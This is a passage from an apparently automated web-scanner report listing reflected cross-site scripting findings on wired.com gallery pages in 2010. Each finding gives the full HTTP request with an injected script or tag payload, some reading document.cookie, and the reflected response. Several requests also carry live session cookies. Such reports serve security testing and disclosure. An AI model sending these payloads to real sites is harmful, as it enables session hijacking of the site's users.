Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d3d"><a>9b77dfd8a23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture74d3d"><a>9b77dfd8a23/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:08:35 GMT
Date: Sun, 21 Nov 2010 19:58:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture74d3d"><a>9b77dfd8a23 ss_art c_multimedia">
...[SNIP]...

1.491. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc69"><a>3cda8068985 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art8cc69"><a>3cda8068985/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:08:49 GMT
Date: Sun, 21 Nov 2010 19:58:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art8cc69"><a>3cda8068985 c_multimedia">
...[SNIP]...

1.492. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85426"><a>aac868d772e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia85426"><a>aac868d772e/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:09:36 GMT
Date: Sun, 21 Nov 2010 19:59:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia85426"><a>aac868d772e">
...[SNIP]...

1.493. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload 966a2<script>alert(1)</script>976c2c8bf57 was submitted in the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1966a2<script>alert(1)</script>976c2c8bf57 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:33:21 GMT
Date: Sun, 21 Nov 2010 20:23:21 GMT
Connection: close
Content-Length: 40715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1966a2<script>alert(1)</script>976c2c8bf57', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.494. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> request parameter is copied into the HTML document as plain text between tags. The payload 21969<script>alert(1)</script>01760d30d83 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1>=121969<script>alert(1)</script>01760d30d83 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:50:58 GMT
Date: Sun, 21 Nov 2010 20:40:58 GMT
Connection: close
Content-Length: 40738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=121969<script>alert(1)</script>01760d30d83', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.495. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the name of an HTML tag. The payload 6981a><script>alert(1)</script>03dc29fdb27 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src=6981a><script>alert(1)</script>03dc29fdb27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:00 GMT
Date: Sun, 21 Nov 2010 20:41:00 GMT
Connection: close
Content-Length: 40743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img%20src=6981a><script>alert(1)</script>03dc29fdb27', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.496. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the HTML document as plain text between tags. The payload d1198<script>alert(1)</script>39b53ac696 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/></h1>=1d1198<script>alert(1)</script>39b53ac696 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:01 GMT
Date: Sun, 21 Nov 2010 20:41:01 GMT
Connection: close
Content-Length: 40821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=1d1198<script>alert(1)</script>39b53ac696', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.497. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload ea80a<script>alert(1)</script>2ef91889cf7 was submitted in the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1ea80a<script>alert(1)</script>2ef91889cf7 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:34:05 GMT
Date: Sun, 21 Nov 2010 20:24:05 GMT
Connection: close
Content-Length: 40729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1ea80a<script>alert(1)</script>2ef91889cf7', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.498. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbadd"><script>alert(1)</script>08561a98595 was submitted in the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:34:07 GMT
Date: Sun, 21 Nov 2010 20:24:07 GMT
Connection: close
Content-Length: 40729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.499. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eac"><script>alert(1)</script>7170e64b2e2 was submitted in the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; __utmb=238032518; __utmc=238032518; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_nr=1290369692237; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:35:32 GMT
Date: Sun, 21 Nov 2010 20:25:32 GMT
Connection: close
Content-Length: 40743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
cript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.500. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a1"><script>alert(1)</script>4b74896c38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:08:35 GMT
Date: Sun, 21 Nov 2010 19:58:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.501. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [slideView parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the slideView request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbdd"><script>alert(1)</script>6a2fa36c36 was submitted in the slideView parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.502. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb54d"><a>c56f61c551c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturebb54d"><a>c56f61c551c/art/multimedia/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturebb54d"><a>c56f61c551c ss_art c_multimedia">
...[SNIP]...

1.503. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c4c"><a>89e1688aab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artc7c4c"><a>89e1688aab6/multimedia/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:17 GMT
Date: Sun, 21 Nov 2010 23:07:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artc7c4c"><a>89e1688aab6 c_multimedia">
...[SNIP]...

1.504. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71fa"><a>b579a399708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

